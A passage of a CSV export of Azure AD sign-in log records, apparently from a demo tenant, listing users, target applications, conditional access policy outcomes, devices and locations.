'9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",71693871-d407-425c-bffa-acef920d0600,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -118.24053955078124, 'latitude': 34.0655517578125}, 'state': 'California', 'city': 'Los Angeles'}",none,none,none,medium,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 Exchange Online,71693871-d407-425c-bffa-acef920d0600,SigninLogs,Sucess,34.06555176,-118.2405396
+1479,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,24:19.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,50126,None,Invalid username or password or Invalid on-premise username or password.,0,dfe2b6e7-f85a-424d-b915-0eb870e66d9e,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,Microsoft Azure,0c1307d4-29d6-4389-a11c-5cbe7f65d7fa,Mobile Apps and Desktop clients,[],notApplied,08/04/2020 10:24,"{'operatingSystem': 'iOS 13', 'deviceId': '', 'browser': 'Mobile Safari 13.4'}",d3a3c86e-d6a1-4323-9bc0-1a26abe30800,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 50126, 'failureReason': 'Invalid username or password or Invalid on-premise username or password.'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,d3a3c86e-d6a1-4323-9bc0-1a26abe30800,SigninLogs,Failed,50.6406517,5.572050095
+1480,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,24:46.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,dfe2b6e7-f85a-424d-b915-0eb870e66d9e,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,Microsoft Azure,0c1307d4-29d6-4389-a11c-5cbe7f65d7fa,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 10:24,"{'operatingSystem': 'iOS 13', 'deviceId': '', 'browser': 'Mobile Safari 13.4'}",3f36af51-0198-41cf-a56a-8a51cfbf2c00,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA completed in Azure AD'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,3f36af51-0198-41cf-a56a-8a51cfbf2c00,SigninLogs,Sucess,50.6406517,5.572050095
+1481,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,33:27.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,2e6fd17c-1227-433e-b3a3-80a74374a7dc,Microsoft.aadiam,Microsoft.aadiam,,Ofer Shezaf,4,IL,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 07:33,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",cbcd7f19-25f4-4cfd-824c-94dc97920500,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 35.44601058959961, 'latitude': 33.017520904541016}, 'state': 'Hazafon', 'city': 'Jish'}",none,none,none,none,[],{'errorCode': 0},Ofer Shezaf,9c459db5-0407-43fe-a2ea-126757297beb,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,cbcd7f19-25f4-4cfd-824c-94dc97920500,SigninLogs,Sucess,33.0175209,35.44601059
+1482,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,32:23.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,9f05e4d8-0094-44de-bae0-73e805df8228,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BE,Office 365 Exchange Online,00000002-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",success,09/04/2020 09:32,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",ed279ba5-6389-4198-91ad-627e16bb0d00,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 Exchange Online,ed279ba5-6389-4198-91ad-627e16bb0d00,SigninLogs,Sucess,50.6406517,5.572050095
+1483,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,32:23.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,9f05e4d8-0094-44de-bae0-73e805df8228,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BE,Office 365 Exchange Online,00000002-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",success,09/04/2020 09:32,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",ed279ba5-6389-4198-91ad-627e16bb0d00,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 Exchange Online,ed279ba5-6389-4198-91ad-627e16bb0d00,SigninLogs,Sucess,50.6406517,5.572050095
+1484,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,32:40.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,911fb8bc-216a-462c-ab06-a1667a193f2c,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BE,Skype Web Experience On Office 365,e48d4214-364e-4731-b2b6-47dabf529218,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 09:32,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",ed279ba5-6389-4198-91ad-627e11bc0d00,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Skype for Business Online,ed279ba5-6389-4198-91ad-627e11bc0d00,SigninLogs,Sucess,50.6406517,5.572050095
+1485,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,46:24.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,574c85ed-8a6d-49c6-adda-5eadf1a76962,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,Microsoft 365 Security and Compliance Center,80ccca67-54bd-44ab-8625-4b79c4dc7775,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,09/04/2020 09:46,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",47dc00a1-c484-43d0-a54f-6777a30a0e00,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,47dc00a1-c484-43d0-a54f-6777a30a0e00,SigninLogs,Sucess,50.6406517,5.572050095
+1486,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,32:50.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,d574a08a-d5d2-424c-8e52-def493514b1e,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BE,Skype Web Experience On Office 365,e48d4214-364e-4731-b2b6-47dabf529218,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 09:32,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",24234731-7e74-417b-b5a0-a50f23c50d00,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Skype for Business Online,24234731-7e74-417b-b5a0-a50f23c50d00,SigninLogs,Sucess,50.6406517,5.572050095
+1487,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,32:45.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,5914cebe-7d87-4859-bd4e-caf1648397eb,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BE,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': 